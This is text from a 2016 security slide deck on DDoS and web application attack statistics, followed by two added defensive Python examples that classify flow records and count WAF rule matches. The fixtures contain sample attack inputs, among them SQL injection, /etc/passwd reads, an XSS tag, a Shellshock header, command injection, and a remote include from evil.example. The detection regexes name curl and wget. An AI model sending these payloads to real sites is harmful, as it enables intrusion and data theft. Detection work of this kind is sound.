DDoS attack patterns across the APJ cloud market
Samuel Chen, CCIE#9607, Enterprise Security Architect, Manager - APJ
www.cloudsec.com/tw
DDoS attacks from Q1 2014 to Q1 2016: each dot represents an individual DDoS attack, and each interval covers a 10-fold increase in attack size. The boxes mark the interquartile range, the middle 50% of attacks.
DDoS Attack Median Packet Rate and IQR: while there were six DDoS attacks in Q1 that exceeded 30 Mpps, more than half of the attacks measured 1 Mpps or less. The graph shows the packet rate for the middle 50% of DDoS attacks from Q1 2014 to Q1 2016.
Compared to Q1 2015:
125% Total DDoS attacks
142% Infrastructure layer attacks
35% Average attack duration
138% Total attacks > 100 Gbps
In Q1 2016, repeat DDoS attacks remained the norm, with an average of 29 attacks per targeted customer. One target suffered 283 attacks, an average of three times per day for the quarter.
Compared to Q4 2015:
23% Total DDoS attacks
107% Repeat attacks per target
23% Infrastructure layer attacks
8% Average attack duration
280% Total attacks > 100 Gbps
Largest attack: 289 Gbps
Most packets per second: 67 Mpps
In Q1 2016, stresser/booter-based botnets remained the source of the vast majority of DDoS attacks observed by Akamai. These tools rely heavily upon reflection techniques to fuel their traffic.
Types of DDoS Attacks & Relative Distribution in Q1 2016 UDP Fragment, DNS, NTP and CHARGEN attack vectors made up almost 70% of the attacks.
10 Most Frequent Attack Vectors by Quarter: TCP Anomaly attacks, which first edged out ICMP attacks in Q4 2015, remain in the top 10 vectors. Avoid data theft and downtime by extending the security perimeter outside the data center and protecting against the increasing frequency, scale and sophistication of web attacks.
Multi-Vector DDoS Attacks Are the Norm: multi-vector attacks accounted for 59% of DDoS activity in Q1 2016, up from 56% in Q4 2015.
Reflection-Based DDoS Attacks, Q1 2015 to Q1 2016: SSDP, NTP, DNS, and CHARGEN have consistently been used as the most common reflection attack vectors, as shown on the left axis. The use of reflection attacks has increased dramatically since Q1 2015, as shown on the right axis.
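The vector-distribution, multi-vector and reflection slides above all rest on the same step: attributing each observed flow to a vector. The following is an added example, not code from the slide deck or from Akamai, of how a defender does that over flow telemetry. The flow records, the Flow field set and the port-to-vector table are constructed here; the table is a simplification of the usual heuristic that reflected replies reach the victim from the amplifier's UDP service port (DNS 53, NTP 123, SSDP 1900, CHARGEN 19).

```python
"""Classify constructed flow records into the DDoS vectors named in the slides.

Added example, not code from the slide deck or from Akamai. The flow records
are constructed sample data, and the port-to-vector table is a simplification
of how reflection vectors show up in flow telemetry at the victim: UDP traffic
whose source port is the amplifier's service port (DNS, NTP, SSDP, CHARGEN).
"""
from collections import Counter, defaultdict, namedtuple

# Reflection vectors from the slide, keyed by the UDP source port the
# reflected replies arrive from.
REFLECTION_PORTS = {53: "DNS", 123: "NTP", 1900: "SSDP", 19: "CHARGEN"}

# Minimal NetFlow-like record (constructed field set, not a real export format).
Flow = namedtuple("Flow", "target proto sport dport nbytes pkts flags frag")

# Constructed sample flows toward three targets in the documentation range 203.0.113.0/24.
SAMPLE_FLOWS = [
    Flow("203.0.113.10", "udp", 123, 45231, 4680, 10, "", False),  # NTP replies
    Flow("203.0.113.10", "udp", 123, 45232, 4680, 10, "", False),
    Flow("203.0.113.10", "udp", 53, 51002, 3900, 3, "", False),    # large DNS answers
    Flow("203.0.113.10", "udp", 1900, 30011, 2950, 9, "", False),  # SSDP replies
    Flow("203.0.113.10", "udp", 0, 0, 1480, 1, "", True),          # non-first IP fragment, no ports
    Flow("203.0.113.10", "tcp", 44123, 80, 60, 1, "S", False),     # SYN flood packet
    Flow("203.0.113.20", "udp", 19, 20500, 1500, 1, "", False),    # CHARGEN replies
    Flow("203.0.113.20", "udp", 19, 20501, 1500, 1, "", False),
    Flow("203.0.113.30", "udp", 33434, 9, 80, 1, "", False),       # plain UDP flood
]


def classify(flow):
    """Return the vector label for one flow."""
    if flow.frag:
        return "UDP Fragment"  # later fragments carry no UDP header, so no ports to match on
    if flow.proto == "tcp" and flow.flags == "S":
        return "SYN"
    if flow.proto == "udp" and flow.sport in REFLECTION_PORTS:
        return REFLECTION_PORTS[flow.sport]
    if flow.proto == "udp":
        return "UDP flood"
    return "other"


def vectors_per_target(flows):
    """Map each target to a Counter of attack bytes per vector."""
    per_target = defaultdict(Counter)
    for flow in flows:
        per_target[flow.target][classify(flow)] += flow.nbytes
    return per_target


def multi_vector_targets(flows):
    """Targets hit by more than one vector at once (the 'multi-vector' share in the slides)."""
    return sorted(t for t, c in vectors_per_target(flows).items() if len(c) > 1)


def reflection_share(flows):
    """Fraction of all attack bytes that arrived via a reflection vector."""
    total = sum(f.nbytes for f in flows)
    reflected = sum(f.nbytes for f in flows if classify(f) in REFLECTION_PORTS.values())
    return reflected / total if total else 0.0


if __name__ == "__main__":
    for target, counts in vectors_per_target(SAMPLE_FLOWS).items():
        print(target, dict(counts))
    print("multi-vector targets:", multi_vector_targets(SAMPLE_FLOWS))
    print("reflection share of bytes: %.1f%%" % (100 * reflection_share(SAMPLE_FLOWS)))
```

Two caveats a practitioner would add before trusting this on live data: a source port of 53 or 123 is evidence of reflection only when the target never sent a matching request, so production detection correlates inbound replies with outbound queries (or with reply size and rate) rather than trusting the port alone; and non-first fragments have no transport header, which is why the fragment check has to run before the port lookup.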
DDoS Attack Frequency by Industry
Average Number of DDoS Attacks per Target: in Q1 2016 there were an average of 29 DDoS attacks per target, up from 24 last quarter. One target was hit with 283 attacks, averaging more than 3 attacks per day.
Top 10 Source Countries for DDoS Attacks in Q1 2016: China was the top source of non-spoofed DDoS attacks in the first quarter, followed by the US.
Top 5 Source Countries for DDoS Attacks, Q1 2015 to Q1 2016: China has been the top source country for DDoS attacks since Q1 2015, with the exception of Q3 2015, when the UK took the top spot.
Mega Attacks > 100 Gbps in Q1 2016: nineteen attacks exceeded 100 Gbps in Q1 2016, with the largest hitting the software and technology, gaming and media-entertainment sectors.
Mega Attacks > 30 Mpps in Q1 2016: of the six attacks exceeding 30 Mpps in Q1 2016, the four largest targeted the software and technology sector.
Spotlight: attack traffic distribution within scrubbing center locations, highlighted with Frankfurt absorbing the highest peak bandwidth of 104 Gbps.
Web Application Attack Analysis
9 Common Web Attack Vectors
SQLi / SQL injection: User content is passed to an SQL statement without proper validation
LFI / Local file inclusion: Gains unauthorized read access to local files on the web server
RFI / Remote file inclusion: Abuse of the dynamic file include mechanism available in many programming languages to load remote malicious code into the victim web application
PHPi / PHP injection: Injects PHP code that gets executed by the PHP interpreter
CMDi / Command injection: Executes arbitrary shell commands on the target system
JAVAi / Java injection: Abuses the Object Graph Navigation Language (OGNL), a Java expression language. Popular due to recent flaws in the Java-based Struts framework, which uses OGNL extensively
MFU / Malicious file upload (or unrestricted file upload): Uploads unauthorized files to the target application that may be used later to gain full control over the system
XSS / Cross-site scripting: Injects client-side code into web pages viewed by others, whose browsers execute the code within the security context (or zone) of the hosting web site. Reads, modifies and/or transmits data accessible by the browser
Shellshock / Disclosed in September 2014: A vulnerability in the Bash shell (the default shell for Linux and Mac OS X) that allows arbitrary command execution by a remote attacker
Web Application Attack Vectors Over HTTP, Q1 2016 SQLi, LFI and XSS were the most prevalent attack vectors. They were used in more than 90% of the attacks over HTTP.
Attacks Over HTTPS, Q1 2016: 30% of the web application attacks observed in Q1 2016 were over encrypted (HTTPS) connections, up from only 11% the previous quarter.
Top 10 Source Countries for Web Application Attacks, Q1 2016
Top 10 Target Countries for Web Application Attacks, Q1 2016 US-hosted web sites were targeted six times more often than the second most popular target country, Brazil.
Web Application Attacks by Industry, Q1 2016 As in previous quarters, the retail industry was most frequently targeted with web application attacks in Q1 2016.
Web Application Attack Triggers by Industry, Q1 2016 94% of the attack triggers for web application attacks in Q1 2016 targeted just eight industries (shown in black).
SQLi and LFI Attack Triggers by Target Industry, Q1 2016
Shellshock, XSS, and MFU Attack Triggers by Industry
CMDI, PHPI, and RFI Attack Triggers by Industry
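The "attack trigger" counts in the vector and industry slides above are produced by matching decoded requests against a rule set and attributing each match to the target site's industry. The following is an added example, not code from the slide deck or from Akamai, that does this for the nine vectors defined on the "9 Common Web Attack Vectors" slide. The request records, the host-to-industry map and the one-pattern-per-vector rule set are all constructed here; a production rule set such as the OWASP Core Rule Set has many rules per vector and normalises requests far more thoroughly.

```python
"""Count web application attack triggers by vector and by target industry.

Added example, not code from the slide deck or from Akamai: the request
records, the host-to-industry map and the one-pattern-per-vector rule set are
all constructed here to show how the per-vector and per-industry trigger
counts in the slides come out of a WAF-style match over decoded requests.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# One representative detection pattern per vector from the "9 Common Web
# Attack Vectors" slide. Deliberately minimal; real rule sets are far larger.
VECTOR_PATTERNS = {
    "SQLi": re.compile(r"(?i)'\s*(or|and)\s+\d+\s*=\s*\d+|union\s+select|;\s*drop\s+table"),
    "LFI": re.compile(r"(\.\./){2,}|/etc/passwd"),
    "RFI": re.compile(r"(?i)[?&]\w+=(https?|ftp)://"),
    "PHPi": re.compile(r"(?i)<\?php|php://(input|filter)"),
    "CMDi": re.compile(r"(?i)[;|&`]\s*(cat|ls|id|whoami|wget|curl)\b"),
    "JAVAi": re.compile(r"%\{[^}]*\}"),  # OGNL expression marker
    "MFU": re.compile(r'(?i)filename="[^"]+\.(php|phtml|jsp|aspx?)"'),
    "XSS": re.compile(r"(?i)<script\b|on\w+\s*=\s*['\"]?\s*(alert|javascript:)"),
    "Shellshock": re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;"),  # Bash function-definition prefix Shellshock abused
}

# Constructed mapping from target hostname to industry, standing in for the
# customer metadata a platform operator would have.
HOST_INDUSTRY = {
    "shop.example": "Retail",
    "news.example": "Media & Entertainment",
    "cms.example": "Hotel & Travel",
    "api.example": "Financial Services",
    "portal.example": "Public Sector",
}

# Constructed request records: URL-encoded request line plus optional headers/body.
SAMPLE_REQUESTS = [
    {"host": "shop.example", "request": "GET /product?id=1%27%20OR%201%3D1--"},
    {"host": "shop.example", "request": "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd"},
    {"host": "news.example", "request": "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"},
    {"host": "cms.example", "request": "GET /index.php?page=http://evil.example/shell.txt"},
    {"host": "api.example", "request": "GET /cgi-bin/status",
     "headers": {"User-Agent": "() { :;}; echo probe"}},
    {"host": "shop.example", "request": "GET /ping?host=127.0.0.1%3Bcat%20%2Fetc%2Fpasswd"},
    {"host": "news.example", "request": "POST /upload",
     "body": 'Content-Disposition: form-data; name="file"; filename="cover.php"'},
    {"host": "api.example", "request": "GET /status?page=1"},  # benign
    {"host": "portal.example", "request": "GET /struts/action?name=%25%7B1%2B1%7D"},
    {"host": "cms.example", "request": "GET /index.php?x=%3C%3Fphp%20phpinfo()%3B%20%3F%3E"},
]


def decode_request(rec):
    """One text blob per request: URL-decoded request line, header values and body."""
    parts = [unquote_plus(rec["request"])]
    parts.extend(rec.get("headers", {}).values())
    parts.append(rec.get("body", ""))
    return "\n".join(parts)


def triggers_for(rec):
    """Set of vectors whose rule fired on this request (a request can trip several)."""
    text = decode_request(rec)
    return {name for name, pattern in VECTOR_PATTERNS.items() if pattern.search(text)}


def count_triggers(records):
    """Return (triggers per vector, triggers per target industry)."""
    by_vector, by_industry = Counter(), Counter()
    for rec in records:
        hits = triggers_for(rec)
        by_vector.update(hits)
        by_industry[HOST_INDUSTRY.get(rec["host"], "Other")] += len(hits)
    return by_vector, by_industry


def share_of(by_vector, names):
    """Fraction of all triggers contributed by the named vectors."""
    total = sum(by_vector.values())
    return sum(by_vector[n] for n in names) / total if total else 0.0


if __name__ == "__main__":
    vectors, industries = count_triggers(SAMPLE_REQUESTS)
    print("by vector:", dict(vectors))
    print("by industry:", dict(industries))
    print("SQLi+LFI+XSS share: %.0f%%" % (100 * share_of(vectors, ["SQLi", "LFI", "XSS"])))
```

Two points worth keeping in mind when reading trigger counts like those in the slides: a trigger is a rule match, not a confirmed compromise, and one request can count several times (the command-injection probe above also trips the LFI rule); and a single decoding pass misses double-encoded input, so a real WAF normalises repeatedly before matching.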
24 Hour Bot Traffic Snapshot
Akamai Intelligent Platform Firewall Activity
Reflector Activity The location of leveraged Internet devices used in reflection-based DDoS attacks during Q1 2016 was concentrated in the US, Asia, and Europe.
Top 10 Reflection Sources by ASN
DDoS Reflection Sources
Cloud Security Resources
Q1 2016 Cloud Security Resources
Scraper and Bot Series: When Good Bots Go Bad
#OpKillingBay Expands Attacks
BillGates Malware Used in DDoS Attacks
Akamai Responds to Forwarding-Loop Issue
IKE/IKEv2 Ripe for DDoS Abuse
Akamai and the Glibc Vulnerability (CVE-2015-7547)
Akamai and the DROWN Vulnerability
DNSSEC Targeted in DNS Reflection, Amplification DDoS Attacks
Akamai Customers Not Vulnerable to SLOTH
How Web Applications Become SEO Pawns